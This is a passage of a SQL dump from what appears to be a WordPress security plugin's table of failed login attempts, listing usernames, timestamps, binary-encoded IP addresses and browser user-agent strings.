Safari/537.36'),(534,1131,1693972692.943334,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0G\n','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(535,1132,1693972695.544531,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0D','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'),(536,1144,1693976485.619178,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0OL','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(537,1179,1693978376.947855,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(538,1179,1693978376.960056,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(539,1226,1693990747.927228,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g{','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0'),(540,1228,1693991234.565629,1,'loginFailValidUsername','admin',1,'$\0`:T\0>L','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0'),(541,1279,1694027546.002904,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(542,1280,1694027553.015987,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(543,1282,1694027859.599491,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0OL','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(544,1284,1694029352.145141,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0D0l','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(545,1302,1694034441.691753,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0bf','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(546,1307,1694038368.918886,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0YC','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(547,1327,1694043750.613812,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0hZ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(548,1330,1694044393.810346,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(549,1332,1694046802.572672,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0u','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(550,1333,1694046824.519482,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(551,1340,1694050240.351317,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0%x','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(552,1343,1694051268.076636,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Kk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(553,1358,1694053328.815175,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0. ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(554,1363,1694054645.244116,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0]','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(555,1366,1694056216.920317,1,'loginFailValidUsername','admin',1,'( D\0\0\0\0\0\0\0\0\0\0!','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0'),(556,1371,1694058566.523250,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0A<','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0'),(557,1387,1694063801.087436,1,'loginFailValidUsername','admin',1,'*G\0\0 \0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(558,1393,1694065788.892566,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0K','Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(559,1394,1694065791.252493,1,'loginFailInvalidUsername','armani',0,'\0\0\0\0\0\0\0\0\0\0m0','Mozilla/5.0 (Linux; Android 7.0; LG-H831) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(560,1395,1694065795.793009,1,'loginFailInvalidUsername','lukas',0,'\0\0\0\0\0\0\0\0\0\0r-','Mozilla/5.0 (Linux; Android 11; SM-N986U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(561,1397,1694065821.805051,1,'loginFailInvalidUsername','zero',0,'\0\0\0\0\0\0\0\0\0\0g^','Mozilla/5.0 (Linux; Android 10; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(562,1398,1694065824.285421,1,'loginFailInvalidUsername','ccc1',0,'\0\0\0\0\0\0\0\0\0\0P\Z\'','Mozilla/5.0 (Linux; Android 11; SM-N981N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(563,1402,1694067698.176356,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0˽^','Mozilla/5.0 (Linux; Android 12; SM-F916U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(564,1403,1694067700.957386,1,'loginFailInvalidUsername','armani',0,'\0\0\0\0\0\0\0\0\0\0+_','Mozilla/5.0 (Linux; Android 11; SM-G975U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36'),(565,1404,1694067705.438407,1,'loginFailInvalidUsername','lukas',0,'\0\0\0\0\0\0\0\0\0\0n','Mozilla/5.0 (Linux; Android 10; JNY-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Mobile Safari/537.36'),(566,1405,1694067707.871644,1,'loginFailInvalidUsername','xxx',0,'\0\0\0\0\0\0\0\0\0\0ʉ','Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-N975U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(567,1406,1694067710.189151,1,'loginFailInvalidUsername','zero',0,'\0\0\0\0\0\0\0\0\0\0kC','Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/97.0.4692.84 Mobile/15E148 Safari/604.1'),(568,1475,1694113680.223552,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(569,1479,1694115830.489513,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Fs','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(570,1518,1694126380.883161,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0eX','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36'),(571,1519,1694126500.746251,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Linux; Android 11) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/96.0.4664.104 Mobile DuckDuckGo/5 Safari/537.36'),(572,1521,1694126944.976646,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0f','Mozilla/5.0 (Linux; Android 9; SM-J737A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(573,1524,1694128742.136547,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0F=','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(574,1525,1694129198.238599,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0v','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36'),(575,1527,1694129433.489237,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\08&','Mozilla/5.0 (Linux; Android 11; SM-G981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Mobile Safari/537.36'),(576,1535,1694130142.076403,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0ij','Mozilla/5.0 (iPhone; CPU iPhone OS 14_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/137.2.345735309 Mobile/15E148 Safari/604.1'),(577,1555,1694134125.551852,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0k3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(578,1557,1694135015.585067,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0>f','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(579,1558,1694136083.108467,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0D0l','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(580,1561,1694137856.740083,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0Ch','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15'),(581,1562,1694137859.612251,1,'loginFailInvalidUsername','armani',0,'\0\0\0\0\0\0\0\0\0\0ʁ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36'),(582,1563,1694137862.968273,1,'loginFailInvalidUsername','henri',0,'\0\0\0\0\0\0\0\0\0\0;','Mozilla/5.0 (iPhone; CPU iPhone OS 15_2_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Mobile/15E148 Safari/604.1'),(583,1564,1694137865.995632,1,'loginFailInvalidUsername','lukas',0,'\0\0\0\0\0\0\0\0\0\0d1','Mozilla/5.0 (Linux; Android 5.0.2; SM-T530NU) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Safari/537.36'),(584,1565,1694137869.335525,1,'loginFailInvalidUsername','xxx',0,'\0\0\0\0\0\0\0\0\0\0g.','Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N975U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(585,1566,1694137872.099726,1,'loginFailInvalidUsername','zero',0,'\0\0\0\0\0\0\0\0\0\0?7u','Mozilla/5.0 (Linux; Android 12; SM-G996U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.92 Mobile Safari/537.36'),(586,1567,1694137874.317793,1,'loginFailInvalidUsername','ccc1',0,'\0\0\0\0\0\0\0\0\0\0/q','Mozilla/5.0 (Linux; Android 11; SM-A326U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36'),(587,1570,1694138349.035415,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0P`','Mozilla/5.0 (Linux; Android 11; SM-G973U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(588,1571,1694138350.855708,1,'loginFailInvalidUsername','armani',0,'\0\0\0\0\0\0\0\0\0\0M0','Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(589,1572,1694138352.744403,1,'loginFailInvalidUsername','henri',0,'\0\0\0\0\0\0\0\0\0\0H','Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36'),(590,1573,1694138361.073158,1,'loginFailInvalidUsername','lukas',0,'\0\0\0\0\0\0\0\0\0\0gW','Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(591,1574,1694138364.474797,1,'loginFailInvalidUsername','xxx',0,'\0\0\0\0\0\0\0\0\0\0tmX','Mozilla/5.0 (Linux; Android 10; LM-K200) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(592,1575,1694138367.485256,1,'loginFailInvalidUsername','zero',0,'\0\0\0\0\0\0\0\0\0\0\"','Mozilla/5.0 (Linux; Android 10; motorola one 5G ace) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(593,1576,1694138369.632959,1,'loginFailInvalidUsername','ccc1',0,'\0\0\0\0\0\0\0\0\0\0@|d','Mozilla/5.0 (Linux; Android 10; SM-S115DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.99 Mobile Safari/537.36'),(594,1580,1694141361.017183,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0?','Mozilla/5.0 (Linux; Android 11; LM-V600) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(595,1581,1694141363.168766,1,'loginFailInvalidUsername','armani',0,'\0\0\0\0\0\0\0\0\0\0`','Mozilla/5.0 (Linux; Android 12; Pixel 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(596,1582,1694141369.119286,1,'loginFailInvalidUsername','henri',0,'\0\0\0\0\0\0\0\0\0\0/`r','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15'),(597,1583,1694141371.769075,1,'loginFailInvalidUsername','lukas',0,'\0\0\0\0\0\0\0\0\0\0t','Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G891A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(598,1584,1694141374.645086,1,'loginFailInvalidUsername','xxx',0,'\0\0\0\0\0\0\0\0\0\0m','Mozilla/5.0 (Linux; Android 11; moto g stylus 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(599,1585,1694141376.705192,1,'loginFailInvalidUsername','zero',0,'\0\0\0\0\0\0\0\0\0\0XQ^','Mozilla/5.0 (Linux; Android 12; Pixel 5a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36 EdgA/96.0.1054.62'),(600,1586,1694141379.225934,1,'loginFailInvalidUsername','ccc1',0,'(\\\0\0\0D','Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1'),(601,1594,1694146211.163759,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(602,1598,1694148552.747782,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘(','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(603,1631,1694159971.056762,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(604,1641,1694162721.957726,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(605,1680,1694176776.368163,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0[֩E','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(606,1681,1694177080.815206,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0[֩E','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(607,1682,1694177970.122405,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0>f','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(608,1696,1694181610.950535,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0?G3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(609,1699,1694182143.352905,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0K','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(610,1728,1694198006.186922,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0V','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(611,1729,1694198006.980108,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0V','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(612,1730,1694198007.862568,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0V','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(613,1731,1694198008.843598,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0V','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(614,1732,1694198009.707054,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0V','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(615,1733,1694198011.553647,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0V','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(616,1737,1694200505.568039,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 k','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(617,1795,1694211665.741697,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0t','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(618,1802,1694218169.165113,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0t','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(619,1809,1694220632.743531,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0:','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(620,1810,1694220698.118957,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(621,1829,1694226039.547474,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0gc','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(622,1837,1694229284.951718,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0>f','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(623,1846,1694235041.852554,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0F=','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(624,1859,1694241576.734389,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(625,1863,1694243103.124046,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0»','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(626,1869,1694245190.834582,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(627,1894,1694253580.919072,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0ي','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(628,1917,1694257188.737937,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(629,1917,1694257188.753003,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(630,1919,1694257555.612189,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(631,1933,1694262309.346685,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0#','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(632,1960,1694278341.033001,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘U','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(633,1962,1694279729.667239,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Kݣ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(634,2053,1694288731.461754,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(635,2055,1694289313.973347,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0ي{','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(636,2066,1694300790.995978,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(637,2090,1694304023.259707,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0ǽ{','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(638,2091,1694305394.275656,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘U','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(639,2102,1694316144.263586,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘T','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(640,2108,1694319831.019354,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0fS~','Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G781W) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(641,2109,1694319848.753561,1,'loginFailInvalidUsername','xxx',0,'\0\0\0\0\0\0\0\0\0\01','Mozilla/5.0 (Linux; Android 12; SM-G981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(642,2110,1694319851.992630,1,'loginFailInvalidUsername','zero',0,'\0\0\0\0\0\0\0\0\0\0ɨF','Mozilla/5.0 (Linux; Android 9; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(643,2111,1694319855.009188,1,'loginFailInvalidUsername','ccc1',0,'\0\0\0\0\0\0\0\0\0\0-','Mozilla/5.0 (Linux; Android 10; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(644,2113,1694320925.421509,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0)[%','Mozilla/5.0 (Linux; Android 11; motorola one 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(645,2114,1694320930.365411,1,'loginFailInvalidUsername','henri',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Linux; Android 10; LM-K300) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile 